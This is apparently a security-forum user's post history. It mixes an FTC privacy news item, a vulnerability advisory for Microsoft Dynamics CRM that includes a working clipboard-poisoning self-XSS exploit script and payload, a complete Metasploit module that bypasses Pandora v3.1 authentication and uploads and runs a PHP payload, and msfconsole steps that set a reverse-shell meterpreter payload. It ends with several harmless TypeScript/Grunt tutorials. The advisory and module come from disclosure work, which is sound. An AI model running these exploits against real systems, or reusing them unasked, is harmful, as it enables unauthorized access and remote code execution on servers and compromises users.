Everything posted by Aerosol
-
A "deeply personal" picture of every consumer could be grabbed by futuristic smart gadgets, the chair of the US Federal Trade Commission has warned.

Speaking at CES, Edith Ramirez said a future full of smart gadgets that watch what we do posed a threat to privacy. The collated data could create a false impression if given to employers, universities or companies, she said. Ms Ramirez urged tech firms to make sure gadgets gathered the minimum data needed to fulfil their function.

Losing respect

The internet of things (IoT), which will populate homes, cars and bodies with devices that use sophisticated sensors to monitor people, could easily build up a "deeply personal and startlingly complete picture" of a person's lifestyle, said Ms Ramirez. The data picture would include details about an individual's credit history, health, religious preferences, family, friends and a host of other indicators, she said. The granularity of the data that could be gathered by existing devices was without precedent, she said, and likely to get more detailed as time went on.

An individual's preference for reality TV or the History Channel could be tracked by tablets or smart TV sets and then shared with other organisations in a way that could prove damaging, she said. "Will this information be used to paint a picture of you that you won't see but that others will?" she asked, wondering if it would influence the types of services people were offered, the ads they were shown or the assumptions firms made about their lifestyle.

The FTC boss acknowledged that the IoT had the potential to improve health and boost economic growth, but said this should not come at the expense of individual privacy. "I question the notion that we must put sensitive consumer data at risk on the off-chance a company might someday discover a valuable use for the information," she said. Data should only be gathered for a specific purpose, said Ms Ramirez, adding that any firm that did not respect privacy would lose the trust of potential customers.

Source
-
Web Application Security Notification

Services Affected: MSN
Type: Web Application Vulnerabilities
MSRC Reference: [21027cl]
Threat Level: High
Severity: High
CVSS Severity Score: 7.8
Impact Type: Complete confidentiality, integrity and availability violation.
Vulnerabilities: Filtration bypass. Authenticated/unauthenticated cross-site scripting. Resource access via Uniform Resource Identifier (URI) scheme abuse. [2] Command and parameter injection in local software.

Vendor Overview

Microsoft Corporation is an American multinational corporation headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics, personal computers and services. Its best-known software products are the Microsoft Windows line of operating systems, the Microsoft Office suite and the Internet Explorer web browser. Microsoft is the world's largest software vendor by revenue. It was founded by Bill Gates and Paul Allen in 1975.

Service Overview

MSN (originally The Microsoft Network) is a collection of Internet websites and services provided by Microsoft Corporation. The service, relaunched in 2014, features 12 sections: weather, news, sports, money, health & fitness, food and drink, travel, autos, video, entertainment and lifestyle. The top of the homepage provides access to popular sites such as Outlook.com, Facebook, Twitter, OneNote, OneDrive and Skype. It is pertinent to note that MSN has more than 415 million visitors worldwide every month. [4]

Read More: HERE
-
Advisory ID: HTB23245
Product: Microsoft Dynamics CRM 2013 SP1
Vendor: Microsoft Corporation
Vulnerable Version(s): (6.1.1.132) (DB 6.1.1.132) and probably prior
Tested Version: (6.1.1.132) (DB 6.1.1.132)
Advisory Publication: December 29, 2014 [without technical details]
Vendor Notification: December 29, 2014
Public Disclosure: January 7, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a DOM-based self-XSS vulnerability in Microsoft Dynamics CRM 2013 SP1, which can be exploited to perform Cross-Site Scripting attacks against authenticated users. The vulnerability exists due to insufficient filtration of user-supplied input passed to the "/Biz/Users/AddUsers/SelectUsersPage.aspx" script after an unsuccessful attempt to send an XML SOAP request. A remote attacker can trick a logged-in user into inserting malicious HTML and script code into the "newUsers_ledit" input field, which is then executed in the user's browser in the context of the vulnerable web application.

To successfully exploit this vulnerability (as with any other XSS vulnerability, besides stored ones) an attacker has to use social engineering to trick the user into inserting malicious code into the above-mentioned field on the vulnerable page. Even though it is a self-XSS, the vulnerability remains quite useful for attacks against users of Microsoft Dynamics CRM, which is otherwise quite secure. Below you can find an exploitation scenario applicable to any web application running Microsoft Dynamics CRM.

Using a pretty simple social engineering technique, an attacker can trick a user into copying some "legitimate" text from a specially prepared malicious page to the clipboard using "Ctrl+C" or the mouse, and then pasting it into the vulnerable web page. The simple exploit code below displays legitimate text to the user and then replaces the text in the user's clipboard with the exploit code:

<script>
// simple exploit to poison clipboard
function replaceBuffer() {
    var selection = window.getSelection(),
        eviltext = '1<img src=x onerror=alert("ImmuniWeb") />',
        copytext = eviltext,
        newdiv = document.createElement('div');
    newdiv.style.position = 'absolute';
    newdiv.style.left = '-99999px';
    document.body.appendChild(newdiv);
    newdiv.innerHTML = copytext;
    selection.selectAllChildren(newdiv);
    window.setTimeout(function () {
        document.body.removeChild(newdiv);
    }, 100);
}
document.addEventListener('copy', replaceBuffer);
</script>

The malicious page instructs the user: "In order to find hidden users just copy this string into the search window: HIDDEN USERS&&DISPLAY"

The victim will see the following text in the browser:

HIDDEN USERS&&DISPLAY

However, they will actually copy and paste the following malicious payload:

1<img src=x onerror=alert("ImmuniWeb")>

The attacker can then trick the user into pasting the copied buffer into the "newUsers_ledit" field on the "https://[victim_host]/[site]/Biz/Users/AddUsers/SelectUsersPage.aspx" page, and the JS code will be executed in the context of the vulnerable website.

Below you can see an image with user cookies displayed in a JS pop-up:

https://www.htbridge.com/advisory/HTB23245.png

Quick video of exploitation:

http://www.youtube.com/watch?v=yS-eS_qWgUI

-----------------------------------------------------------------------------------------------

Solution:

On the 31st of December 2014, Microsoft replied as follows: "MSRC does not consider self-XSS issues to be security vulnerabilities. For a discussion of how we define security vulnerabilities, see http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx"

Taking into consideration the rise of successful self-XSS attack campaigns in 2014, we do consider this issue to be a security vulnerability. As the vendor refused to provide an official fix, we suggest blocking access to the vulnerable script using a WAF or web server configuration as a temporary solution.
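Since Dynamics CRM runs on IIS, one way such blocking could be implemented is with IIS request filtering; the fragment below is a hedged sketch, not an official mitigation, so verify the exact path and side effects in your deployment before relying on it:

<!-- Hypothetical web.config fragment: deny requests to the vulnerable page
     via IIS request filtering until an official fix is available. -->
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <denyUrlSequences>
          <add sequence="/Biz/Users/AddUsers/SelectUsersPage.aspx" />
        </denyUrlSequences>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>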
-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23245 - https://www.htbridge.com/advisory/HTB23245 - Self-XSS in Microsoft Dynamics CRM 2013 SP1.
[2] Microsoft Dynamics CRM 2013 - http://www.microsoft.com/en-us/dynamics/crm.aspx - Microsoft Dynamics CRM is our customer relationship management (CRM) business solution that drives sales productivity and marketing effectiveness through social insights, business intelligence, and campaign management in the cloud, on-premises, or with a hybrid combination.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability in Pandora v3.1
        as disclosed by Juan Galiana Lara. It also integrates with the built-in
        pandora upload which allows a user to upload arbitrary files to the
        '/images/' directory. This module was created as an exercise in the
        Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Juan Galiana Lara',                          # Vulnerability discovery
          'Raymond Nunez <rcnunez[at]upd.edu.ph>',      # Metasploit module
          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>',  # Metasploit module
          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',       # Metasploit module
          '_flood <freshbones[at]gmail.com>',           # Metasploit module
          'mubix <mubix[at]room362.com>',               # Auth bypass and file upload
          'egypt <egypt[at]metasploit.com>',            # Auth bypass and file upload
        ],
      'References'     =>
        [
          ['CVE', '2010-4279'],
          ['OSVDB', '69549'],
          ['BID', '45112']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic Targeting', { 'auto' => true }]],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2010",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
      ], self.class)
  end

  def check
    base = target_uri.path

    # retrieve software version from login page
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'index.php')
      })
      if res and res.code == 200
        # Tested on v3.1 Build PC100609 and PC100608
        if res.body.include?("v3.1 Build PC10060")
          return Exploit::CheckCode::Appears
        elsif res.body.include?("Pandora")
          return Exploit::CheckCode::Detected
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionError
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  # upload a payload using the pandora built-in file upload
  def upload(base, file, cookies)
    data = Rex::MIME::Message.new
    data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
    data.add_part("Go", nil, nil, 'form-data; name="go"')
    data.add_part("images", nil, nil, 'form-data; name="directory"')
    data.add_part("1", nil, nil, 'form-data; name="upload_file"')

    data_post = data.to_s
    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(base, 'index.php'),
      'cookie'   => cookies,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => {
        'sec'  => 'gsetup',
        'sec2' => 'godmode/setup/file_manager',
      },
      'data'     => data_post
    })

    register_files_for_cleanup(@fname)
    return res
  end

  def exploit
    base = target_uri.path
    @fname = "#{rand_text_numeric(7)}.php"
    cookies = ""

    # bypass authentication and get session cookie
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(base, 'index.php'),
      'vars_get' => {
        'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
        'loginhash_user' => 'admin',
        'loginhash'      => '1',
      },
    })

    # fix if logic
    if res and res.code == 200
      if res.body.include?("Logout")
        cookies = res.get_cookies
        print_status("Login Bypass Successful")
        print_status("cookie monster = " + cookies)
      else
        fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
      end
    end

    # upload PHP payload to images/[fname]
    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
    php = %Q|<?php #{payload.encoded} ?>|
    begin
      res = upload(base, php, cookies)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end

    if res and res.code == 200
      print_good("#{peer} - File uploaded successfully")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
    end

    # retrieve and execute PHP payload
    print_status("#{peer} - Executing payload (images/#{@fname})")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'images', "#{@fname}")
      }, 1)
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
    end
  end
end
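For reference, running a module like this from msfconsole would look roughly as follows; the module path is an assumption (it depends on where the file is placed under modules/exploits/), and the addresses are placeholders:

msf > use exploit/unix/webapp/pandora_upload_exec   # assumed path
msf exploit(pandora_upload_exec) > set RHOST 192.168.1.100
msf exploit(pandora_upload_exec) > set TARGETURI /pandora_console/
msf exploit(pandora_upload_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(pandora_upload_exec) > set LHOST 192.168.1.5
msf exploit(pandora_upload_exec) > exploit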
Source
-
Good article, but it has already been posted: https://rstforums.com/forum/95033-hacking-tor-network-follow-up.rst?highlight=Hacking+Tor+Network%3A+Follow Please use the "Search" function before posting.
-
In Part I we set up the basic project and prepared the output package for a mobile device. This gave us some benefits coming from the statically typed system provided by Typescript and its dependency loading, and gave us some automation in building and possible integration with Continuous Integration systems. In Part II we laid out the infrastructure for easy maintenance of large projects with Jade, Stylus and Q/A tools. This part will cover bootstrapping of a Require.js application and data binding, namely the MVVM pattern with Knockout.js.

Bootstrapping

In order to use the AMD system from Require.js effectively, libraries have to expose their components via the export keyword instead of providing global variables. Although this is becoming the standard way to distribute JS libraries, there are still libraries that do it the old way, and that might confuse Require.js. To be able to use such libraries we can bootstrap our application using shims. In this part we will be using Zepto.js (a lightweight counterpart to jQuery) and Knockout.js, both of which expose global objects - in the case of Zepto it's $, like jQuery, and in the case of Knockout it's ko. We will continue in the project from last time, adding the minified zepto.min.js and knockout-2.3.0.js into the lib folder. Now we need to tell Require.js where to look for those files; this can easily be achieved with the shim functionality by defining a configuration file:

requirejs.config({
  paths: {
    "zepto": "libs/zepto.min",
    "knockout": "libs/knockout-2.3.0"
  },
  shim: {
    zepto: {
      exports: "$"
    }
  }
});

Please note that we are not providing the .js extension in the paths section. Since we will be using these libraries across the whole project, this configuration needs to occur before the first module tries to load them. This brings an interesting chicken-and-egg problem: Typescript generates declare statements as the first lines in the file, so if we put this configuration into a Typescript file and load e.g. application.ts, which in turn uses Zepto, it will fail, because at the moment of loading the configuration has not yet been processed. There are two ways out of this problem - one is to write config.js in pure Javascript and do the imports in the correct places, the other is a mixed approach. In this example we will use the latter, where we benefit from the fact that Javascript code is fully valid in Typescript files. We will update src/config.ts to the following:

/// <reference path='../extern/require.d.ts'/>
"use strict";

requirejs.config({
  paths: {
    "zepto": "zepto.min",
    "knockout": "knockout-2.3.0"
  },
  shim: {
    zepto: {
      exports: "$"
    }
  }
});

// Stage one
require(['zepto', 'knockout'], (zepto, knockout) => {
  // Stage two
  require(['main'], main => {
    new main.Main().run();
  });
});

As you can see, we are loading dependencies in two stages - the reason is that Require.js practices lazy loading, but in this special case we want all those libraries pre-loaded before continuing. Another thing worth noticing is that we reference .d.ts files in the header - without this information Typescript would not know about the Require.js objects and functions.
We can obtain these files from e.g. the DefinitelyTyped site and put:

require.d.ts into /extern/require.d.ts
zepto.d.ts into /extern/zepto.d.ts (we will use this one later)
knockout.d.ts into /extern/knockout.d.ts (we will use this one later)
knockout.amd.d.ts into /extern/knockout.amd.d.ts (we will use this one later - it is an AMD wrapper around standard Knockout)

These files are Definition TypeScript files - they contain only definitions of objects, not the real implementation. You can find more information about this in the Typescript Language Reference.

Note: Typescript recently got support for generics and some libraries are already using this concept; the previous package.json pointed to an older version of Typescript, so it should be updated (line 14) to:

"grunt-typescript": "0.2.1",

The last change we need to make is to tell Grunt to copy all libraries from the lib folder; change line 19 in Gruntfile.js to:

{ flatten: true, expand: true, src: ['lib/*.js'], dest: 'dist/www/js/'}

With all the infrastructure in place we can start using all libraries as usual, with all the benefits of Typescript and lazy loading. A quick example could be updating src/main.ts to the following:

/// <reference path='../extern/zepto.d.ts'/>
var $ = require("zepto");

export class Main {
    constructor() {
        console.log("main.init()");
        $(".corpus").click(() => {
            alert("hello world!");
        });
    }

    run() {
        console.log("main.run()");
    }
}

This should display a message box with the message "hello world" after clicking on the text in the browser.

Knockout.js

So far it has been more about laying out infrastructure than doing real work. In this chapter we take a look at how to utilize all of the components we have set up so far, and we will build a simple menu. First, let's introduce the Knockout.js library; it's a Model-View-ViewModel pattern based binding library which will be familiar to Windows Phone developers. For those unaware of the concept I recommend trying the live examples on the Knockout web pages, but in our case we will split functionality as follows:

Model - simple JSON files with data to be displayed
View - HTML page generated from Jade and CSS styles from Stylus
ViewModel - Typescript compiled into Javascript, binding view to model and acting on events

Let's start with the Model - we create a new file src/menuModel.ts which will contain the items that we wish to display:

export interface MenuItem {
    name: string;
    icon: string;
    id: number;
};

export var items: MenuItem[] = [
    { id: 0, name: "Home", icon: "home.png" },
    { id: 1, name: "Items", icon: "items.png" },
    { id: 2, name: "Settings", icon: "settings.png" }
];

The file defines an interface for the data displayed in the menu and the menu items themselves - this information could also come e.g. from an AJAX call. Now to prepare the ViewModel, which will establish the data relation between View and Model. We will update src/main.ts to the following:

/// <reference path='../extern/knockout.amd.d.ts'/>
var $ = require("zepto");

import menuModel = module("./menuModel");
import ko = module("knockout");

export class Main {
    menuItems: KnockoutObservableArray<menuModel.MenuItem>;

    constructor() {
        console.log("main.init()");
        this.menuItems = ko.observableArray(menuModel.items);
    }

    run() {
        console.log("main.run()");
        ko.applyBindings(this);
    }
}

Here we prepare an observable array of our menu items for Knockout.js and bind it as the main object. This is everything we need to do for display purposes - Knockout will handle everything else for us.
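The items above are hard-coded, but as noted the model data could equally come from an AJAX call. A minimal hedged sketch of what that might look like inside the Main class, using Zepto's $.getJSON; the "api/menu.json" endpoint is an assumption, not part of the original project:

// Hypothetical alternative constructor body: fetch the menu over AJAX.
// "api/menu.json" is an assumed endpoint returning MenuItem[] as JSON.
constructor() {
    console.log("main.init()");
    this.menuItems = ko.observableArray([]);  // start empty
    $.getJSON("api/menu.json", (items: menuModel.MenuItem[]) => {
        this.menuItems(items);  // setting the observable array re-renders all bindings
    });
}

Because menuItems is an observable array, calling it with the freshly loaded array is all Knockout needs to update the bound UI.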
The last part is preparing the View - since we will most probably be using the same menu on multiple pages, we extract all relevant definitions into a new file views/menu.jade:

ul.menu(data-bind="foreach: menuItems")
    li(data-bind="text: name")

The first line creates a UL element which will be bound to the property named menuItems; since we are using the foreach keyword, it is expected that this property will be an Array. Everything declared within this element will be copied as many times as there are items in the collection. The second line says it should be an LI element whose text is bound to the name property of every item of the menuItems collection. Since we want to create separate HTML files, not one big one, we need to update Gruntfile.js lines 45-47:

files: [
    { expand: true, ext: ".html", cwd: "views/", src: ['*.jade'], dest: 'dist/www/' }
]

The last bit of functionality is to include the menu in our index view - we update views/index.jade:

html
    head
        link(rel='stylesheet', href='css/index.css')
        script(data-main='js/config', src='js/require.js')
    body
        include menu.jade
        .corpus Hello, world!

That was easy, wasn't it? Unfortunately this doesn't look much like a menu, so let's extend the example a bit more and style it in a more conventional way (styles/index.styl):

body
    font: 100% "Trebuchet MS", sans-serif

.canvas
    margin: 8px

.menu
    list-style-type none
    padding 0px
    margin 0px

.menu li
    width 64px
    height 64px
    display inline-block
    margin 0 2px

.menu .selected
    font-weight bold

We would like to make a menu item bold when it's selected; to achieve this we first need to know which menu item is selected. This should be extracted into a menu component (e.g. src/menu.ts), but for the sake of simplicity we put it into src/main.ts:

/// <reference path='../extern/knockout.amd.d.ts'/>
var $ = require("zepto");

import menuModel = module("./menuModel");
import ko = module("knockout");

export class Main {
    menuItems: KnockoutObservableArray<menuModel.MenuItem>;
    selectedMenu: KnockoutObservable<number>;

    constructor() {
        console.log("main.init()");
        this.menuItems = ko.observableArray(menuModel.items);
        this.selectedMenu = ko.observable(menuModel.items[0].id);
    }

    run() {
        console.log("main.run()");
        ko.applyBindings(this);
    }

    selectMenu(id: number) {
        this.selectedMenu(id);
    }
}

Please note that in order to update the value we need to perform a function call instead of an assignment. This is often a source of issues. Now that we know which menu item is selected, we need to bind this information to the UI and propagate changes back to the ViewModel; we update views/menu.jade to achieve this:

ul.menu(data-bind="foreach: menuItems")
    li(data-bind="text: name, css: { selected: $root.selectedMenu() == id }, event: { click: $root.selectMenu.bind($root, id) }")

Again, please note that in order to obtain the value we need to perform a function call. The $root object in this case contains a reference to the top-level ViewModel object (in our case the instance of class Main). Since Knockout.js processes events on our behalf, the context (this) of the called methods will always be within Knockout unless we bind them to the correct context (in this case $root).

Compile with grunt and enjoy your menu, built without doing any event handling or CSS operations! As usual, you can find a zipped archive with the complete example here.

Source
-
Overview

In Part I we set up the basic project and prepared the output package for a mobile device. This gave us some benefits coming from the statically typed system provided by Typescript and its dependency loading, and gave us some automation in building and possible integration with Continuous Integration systems. This part will cover additional tools that can be used to provide better cooperation with other developers, and template engines. We will cover the following topics:

Templates of views
Templates of CSS styles
Maintenance

Jade - view templates

Jade is a powerful template engine for HTML pages or snippets that can be controlled via the models passed in. Traditionally it's used more on web servers to provide base templates, however with our setup we can easily reuse this component to prepare mobile web applications and take away some of the redundancy that comes into play with HTML. To start, we install the Jade task for Grunt:

> npm install grunt-contrib-jade --save-dev

Now we can update our existing views/index.html file to views/index.jade:

html
  head
    script(data-main='js/config', src='js/require.js')
  body
    #corpus Hello, world!

And finally update our Gruntfile.js to execute the new task:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    },
    copy: {
      libs: {
        files: [
          { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'}
        ]
      },
      tizen: {
        files: [
          { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'}
        ]
      }
    },
    zip: {
      tizen: {
        src: 'dist/tizen/*',
        cwd: 'dist/tizen',
        dest: 'dist/helloWorld.wgt'
      }
    },
    jade: {
      compile: {
        options: {
          data: { debug: true }
        },
        files: {
          "dist/www/index.html": ["views/*.jade"]
        }
      }
    }
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.loadNpmTasks('grunt-contrib-copy');
  grunt.loadNpmTasks('grunt-zip');
  grunt.loadNpmTasks('grunt-contrib-jade');

  // Default task(s).
  grunt.registerTask('default', ['copy:libs', 'typescript', 'jade']);
  grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']);
};

This approach has the added benefit of simpler structure (no need for closing tags), better readability, and the ability to use inheritance, blocks and includes, as the sketch below illustrates.
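Since template inheritance is one of the main reasons to adopt Jade, here is a small hedged sketch of what it could look like in this project; the layout.jade file and its block names are hypothetical, not files the article actually creates:

//- layout.jade (hypothetical base template)
html
  head
    block head
  body
    block content

//- index.jade, rewritten to extend the base template
extends layout

block head
  script(data-main='js/config', src='js/require.js')

block content
  #corpus Hello, world!

Each page then only declares the blocks it overrides, while the shared skeleton lives in one place.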
Stylus - CSS templates

A similar approach as for views can be used for CSS with Stylus; in this case the benefit is less obvious, but in-line conditioning and functions can take away some of the maintenance problems. Integrating it into our solution is straightforward:

> npm install grunt-contrib-stylus --save-dev

Put the initial style definition into styles/index.styl:

body
  font: 62.5% "Trebuchet MS", sans-serif

#canvas
  margin: 8px

Update views/index.jade:

html
  head
    link(rel='stylesheet', href='css/index.css')
    script(data-main='js/config', src='js/require.js')
  body
    #corpus Hello, world!

And finally update Gruntfile.js:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    },
    copy: {
      libs: {
        files: [
          { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'}
        ]
      },
      tizen: {
        files: [
          { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'},
          { flatten: true, expand: true, src: ['dist/www/css/*'], dest: 'dist/tizen/css'}
        ]
      }
    },
    zip: {
      tizen: {
        src: 'dist/tizen/*',
        cwd: 'dist/tizen',
        dest: 'dist/helloWorld.wgt'
      }
    },
    jade: {
      compile: {
        options: {
          data: { debug: true }
        },
        files: {
          "dist/www/index.html": ["views/*.jade"]
        }
      }
    },
    stylus: {
      compile: {
        files: {
          'dist/www/css/index.css': 'styles/index.styl'
        }
      }
    }
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.loadNpmTasks('grunt-contrib-copy');
  grunt.loadNpmTasks('grunt-zip');
  grunt.loadNpmTasks('grunt-contrib-jade');
  grunt.loadNpmTasks('grunt-contrib-stylus');

  // Default task(s).
  grunt.registerTask('default', ['copy:libs', 'typescript', 'jade', 'stylus']);
  grunt.registerTask('tizen', ['default', 'copy:tizen', 'zip:tizen']);
};

Maintenance

An important part of the software development process is making sure that everyone on the team starts from the same spot, follows the same rules and avoids common mistakes. The first part of this process can be automated by linting (CSSLint, JSLint, JSHint etc.), unit testing (QUnit) and adding a clean task; the second part can be done with peer code reviews. Let's start by adding some more tasks:

> npm install grunt-contrib-csslint grunt-contrib-jshint grunt-contrib-qunit grunt-contrib-clean --save-dev

Now let's make clean & lint part of our daily workflow by updating Gruntfile.js:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    },
    copy: {
      libs: {
        files: [
          { flatten: true, expand: true, src: ['lib/require.js'], dest: 'dist/www/js/'}
        ]
      },
      tizen: {
        files: [
          { flatten: true, expand: true, src: ['platform/tizen/**'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/index.html'], dest: 'dist/tizen'},
          { flatten: true, expand: true, src: ['dist/www/js/*'], dest: 'dist/tizen/js'},
          { flatten: true, expand: true, src: ['dist/www/css/*'], dest: 'dist/tizen/css'}
        ]
      }
    },
    zip: {
      tizen: {
        src: 'dist/tizen/*',
        cwd: 'dist/tizen',
        dest: 'dist/helloWorld.wgt'
      }
    },
    jade: {
      compile: {
        options: {
          data: { debug: true }
        },
        files: {
          "dist/www/index.html": ["views/*.jade"]
        }
      }
    },
    stylus: {
      compile: {
        files: {
          'dist/www/css/index.css': 'styles/index.styl'
        }
      }
    },
    csslint: {
      strict: {
        options: { import: 2 },
        src: ['dist/www/css/*.css']
      }
    },
    jshint: {
      files: [
        'dist/www/js/main.js',
        'dist/www/js/config.js'
      ],
      options: {
        force: true, // Don't fail hard ..
        browser: true,
        devel: true,
        globals: { define: true }
      }
    },
    clean: ['dist']
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.loadNpmTasks('grunt-contrib-copy');
  grunt.loadNpmTasks('grunt-zip');
  grunt.loadNpmTasks('grunt-contrib-jade');
  grunt.loadNpmTasks('grunt-contrib-stylus');
  grunt.loadNpmTasks('grunt-contrib-csslint');
  grunt.loadNpmTasks('grunt-contrib-jshint');
  grunt.loadNpmTasks('grunt-contrib-clean');

  // Default task(s).
  grunt.registerTask('default', ['copy:libs', 'typescript', 'jade', 'stylus', 'csslint', 'jshint']);
  grunt.registerTask('tizen', ['clean', 'default', 'copy:tizen', 'zip:tizen']);
};

By running the grunt command we will run into a couple of issues in both the CSS and JS files (bad, bad developer!). Most of them can be easily resolved, except for W033 (missing semicolon) - the semicolon is not generated by the Typescript compiler in its current version - so we turn off hard failure for JS validation. With the clean task integrated into the tizen target we can ensure that everybody will always receive the same build from the same source files; the clean task can also be run directly to force cleaning of the dist directory.

The complete project can be downloaded here without the node_modules folder, so it is necessary to run the following command from the project directory to load dependencies:

npm install

Source
-
Node Webapp Sample

Overview

With more and more powerful mobile devices spreading through the population, we can see that mobile web applications are starting to boom on mobile devices as well. This brings a new set of people into this segment, looking at this way of development from a new angle. Traditionally, web applications target a desktop computer, which is usually an order of magnitude more powerful than the average mobile device; in combination with the known issues of web development (a fragmented platform, Javascript etc.) and mobile-world limitations like limited available memory and external events like low battery, incoming calls etc., this can lead to quick frustration and dismissal of the platform. Webapps definitely have their place in current ecosystems as a tool for quick prototyping and showcasing features, and the heavy investments in Tizen, Firefox OS and Ubuntu Mobile promise that in a short time frame this can become a viable option for production-quality applications as well.

Still, given the nature of the tools used in this area, it quickly becomes a pain to maintain and add new features. One of the major contributors to this is that Javascript as the main language was designed with other goals in mind (simplicity, an easy learning curve), while more traditional languages like Java, C# or C++ focus more on larger-scale project maintainability. In this article I'll try to target the following issues:

Static typing in Javascript
Module loading in larger projects
Packaging for a mobile platform

Infrastructure

As the main tool in this article I'll be using Node.js, with a setup that can be easily deployed to the Continuous Integration system of your choice. The choice of Node.js is driven by the fact that it is a server-side Javascript engine which easily integrates with our web app (no need for special XML files etc.) and provides a good toolset for web app development. Assuming an installed Node.js (the current version is v0.10.3), we start by laying down some infrastructure and creating a new package in a new directory (e.g. helloworld):

npm init

Now we configure our new project by answering a couple of questions (name, version, entry point etc. - the defaults are fine) and we will be granted a newly created package.json file, which serves as the descriptor of our package. Next we install Grunt (the current version is v0.4.1), which we will be using to chain our toolset and save us some headaches (and of course create a whole set of new ones). We need to install it globally to get the new grunt command, by invoking:

npm install -g grunt-cli

The main driver of the Grunt system is the Gruntfile.js file, which can be created from a template or by hand. Since the templates are quite complex, we will start with a very simple Gruntfile that will be extended:

module.exports = function(grunt) {
  // Project configuration.
  grunt.initConfig({
    pkg: grunt.file.readJSON('package.json'),
    typescript: {
      base: {
        src: ['src/**/*.ts'],
        dest: './dist/www/js',
        options: {
          module: 'amd', //or commonjs
          target: 'es5', //or es3
          base_path: 'src'
        }
      }
    }
  });

  grunt.loadNpmTasks('grunt-typescript');
  grunt.registerTask('default', ['typescript']);
};

We still need to install a local copy of Grunt + tasks into our project:

npm install grunt --save-dev

The --save-dev option tells NPM that we need this package only for development - our final code won't need it. And now we should be able to invoke the grunt command from the command line to run our build system:

grunt

Success! By invoking Grunt without parameters we run the default task.
